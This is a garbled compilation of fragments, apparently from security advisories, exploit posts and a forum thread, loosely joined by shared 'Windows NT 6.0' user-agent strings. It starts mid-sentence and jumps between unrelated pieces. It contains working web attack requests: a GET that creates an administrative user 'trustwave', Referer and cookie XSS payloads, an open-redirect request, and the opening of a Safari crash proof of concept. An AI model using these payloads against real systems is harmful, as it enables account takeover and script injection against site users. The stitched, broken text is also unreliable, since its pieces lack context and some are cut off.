Windows NT 6.0
"trustwave" to the administrative user group.
#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
2) Referer header XSS attack - data needs to be sent using the POST method
POST https://target-domain.foo:2381/hmaserv/common/setitem.php
host: target-domain.foo:2381
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)
Referer: http://www.procheckup.com</script><script>alert(1)</script>
Cookie:
Compaq-HMMD=0001-7252052a-43b2-fb4a-951f-78af9561826a-1275875265807763;
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233
GET /WebID/IISWebAgentIF.dll?Redirect?url=ftp://bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm HTTP/1.1
Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
> Tested on:
> Windows Vista Version Service Pack 1 Build 6001
> Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
> 2401 Mhz, 2 Core(s), 2 Logical Processor(s)
>
> User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
> rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
> (.NET CLR 3.5.30729)
> ============================================================
This is the firefox user agent string...
The Apple Safari browser is prone to a denial of service vulnerability when parsing certain HTML content.
This is possible due to a failure in handling exceptional conditions. The issue is caused by a memory corruption error when handling JavaScript elements, which could be exploited by remote attackers to crash the browser by tricking a user into visiting a specially crafted web page.
This issue can NOT lead to remote code execution, so the potential security risk is rated low.
The exploit has been tested on Windows Vista SP2 with Safari 4.0.4 using the following user agent:
Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Proof of Concept:
============
<script>
var overloadtag = "<marquee>";
Cookie: webmailSession=0; cookieTest=cookiesEnabled; checkOverQuota=0;
passwordExpireWarning=0
Host: 192.168.0.222:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
While investigating this alert, I've discovered that this vulnerability
is more serious than I initially expected. This is a very serious
vulnerability because using information from the log files it's possible
to gather enough information to read the file containing all the emails
Tested on:
Windows Vista Version Service Pack 1 Build 6001
Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
2401 Mhz, 2 Core(s), 2 Logical Processor(s)
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
(.NET CLR 3.5.30729)
============================================================
GET /dana/nc/ncrun.cgi?launch_nc=1 HTTP/1.1
Host: 10.0.5.23
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://10.0.5.23/dana/home/index.cgi
Cookie: DSPREAUTH=; DSFirstAccess=1255332662; DSHCSTARTED=x; DSASSERTREF=x; DSLastAccess=1255332662; lastRealm=Users; DSSignInURL=/e6cf2"><script>alert(1)</script>81d17f3a375;
<name></name>
<website />
<comment></comment>
<date></date>
<user_ip>127.0.0.1</user_ip>
<user_agent>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5</user_agent>
<spam>0</spam>
</message>
###########################################################################
GET /index.php?page=Poem/Poem.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, */*
Accept-Language: en-au
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Host: www.footprints-inthe-sand.com
Connection: Keep-Alive
It could either be because of what Sean said with the Range request or the Partial GET Request in Firefox. But I think you are probably correct Rolphin, as I've had a lot of Windows Media Player crashes recently. Either way, Windows Media Player should probably not be incorporated into Firefox if it's going to crash. A more stable platform should be used (such as Silverlight).
installed) will use whatever the default media player is on your PC.
> Accept-Language: en-au
> UA-CPU: x86
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
> Host: www.footprints-inthe-sand.com
> Connection: Keep-Alive
>
> It could either be because of what Sean said with the Range request or the Partial GET Request in Firefox. But I think you are probably correct Rolphin, as I've had a lot of Windows Media Player crashes recently. Either way, Windows Media Player should probably not be incorporated into Firefox if it's going to crash. A more stable platform should be used (such as Silverlight)